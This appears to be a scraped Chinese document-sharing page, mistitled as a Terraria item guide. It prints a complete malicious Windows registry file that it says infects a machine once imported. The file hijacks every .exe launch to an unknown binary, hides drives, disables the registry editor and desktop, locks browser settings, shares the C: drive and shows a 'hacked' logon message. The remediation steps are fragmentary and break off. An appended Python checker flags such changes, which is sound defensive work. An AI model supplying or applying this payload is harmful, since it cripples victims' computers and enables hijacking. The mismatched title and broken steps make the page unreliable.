Terraria Item Guide: Virus + Defense
Source: 百度文库 (Baidu Wenku)  Editor: 偶看新闻  Time: 2024/05/10 14:05:38
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
""="c:\\windows\\bd.exe"
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
""="c:\\windows\\xm.ico"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"NoDrives"=dword:FFFFFFFF
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NotrayContextMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoStartMenuMFUprogramsli
"NoDesktop"=dword:00000001
"NoDispAppearancePage"=dword:00000001
"NoLogOff"=dword:00000001
"NoRecentDocsMenu"=dword:00000001
"NoSetFolders"=dword:00000001
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoViewContextMenu"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
""="txtfile"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ScanRegistry"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"=999
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="你的电脑被飞剑吹雪黑了
"LegalNoticeText"="别人笑我太疯癫,我笑他人看不穿"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\CDFS]
"Prefetch"=dword:00 00 09 00
"CacheSize"=dword:AC 09 00 00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetTaskbar"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoSaveSettings"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
"NoRealMode"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001
"NoBrowserOptions"=dword:00000001
"NoBrowserSaveAs"=dword:00000001
"NoFileOpen"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Advanced"=dword:00000001
"Cache Internet"=dword:00000001
"AutoConfig"=dword:00000001
"HomePage"=dword:00000001
"History"=dword:00000001
"Connwiz Admin Lock"=dword:00000001
"SecurityTab"=dword:00000001
"ResetWebSettings"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoAddingSubScriptions"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFileMenu"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Flags"=dword:302
"Type"=dword:00000000
"Path"="C:\\"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://blog.sina.com.cn/zhaoqiangpersonal"
"Window Title"="飞剑吹雪欢迎你"
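Saving the above as a .reg file and importing it into the registry infects the machine.
What should you do if you have been infected?
1. If the registry can still be imported into, i.e. double-clicking a .reg file imports it into the registry
For example
2. The registry cannot be imported into at all
Download od
Because viruses generally infect exe, i.e. they modify the value after exefile=
We choose od as the "Open with" program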
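The following is an added example, not part of the original page: a Python check that parses .reg text before import and flags three kinds of change the file above makes (a replaced exefile open command, a re-pointed .reg association, and non-zero values under a Policies key). The rule names, the helper names and the sample text are constructed for illustration; the stock values assumed are `"%1" %*` for the exefile open command and `regfile` for .reg.

```python
import re

# Constructed sample: entries of the kind listed above plus one benign value.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
""="c:\\windows\\bd.exe"
[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
""="txtfile"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="400"
'''

EXE_STOCK = '"%1" %*'   # stock default of exefile\shell\open\command
REG_STOCK = 'regfile'   # stock default of the .reg association

def parse_reg(text):
    """Yield (key, value_name, raw_data); '' names the key's default value,
    which regedit exports as @ and the page writes as ""."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1].rstrip('\\')      # the page writes a trailing backslash
            continue
        m = re.match(r'(@|"(?:[^"\\]|\\.)*")\s*=\s*(.+)$', line)
        if key and m:
            name = '' if m.group(1) in ('@', '""') else m.group(1)[1:-1]
            yield key, name, m.group(2)

def sz(data):
    """Decode a quoted string value (backslash escapes); other types pass through."""
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return re.sub(r'\\(.)', r'\1', data[1:-1])
    return data

def findings(text):
    """Return (rule, key, value_name) for entries that alter the checked defaults."""
    out = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        dword = re.fullmatch(r'dword:([0-9a-f]{1,8})', data.lower())
        if k.endswith(r'\exefile\shell\open\command') and name == '' and sz(data) != EXE_STOCK:
            out.append(('exe-handler-changed', key, name))
        elif k.endswith(r'\.reg') and name == '' and sz(data).lower() != REG_STOCK:
            out.append(('reg-association-changed', key, name))
        elif '\\policies\\' in k and dword and int(dword.group(1), 16) != 0:
            out.append(('policy-restriction', key, name))
    return out
```

Calling `findings(SAMPLE)` returns one entry per flagged value; the benign `MenuShowDelay` line produces none.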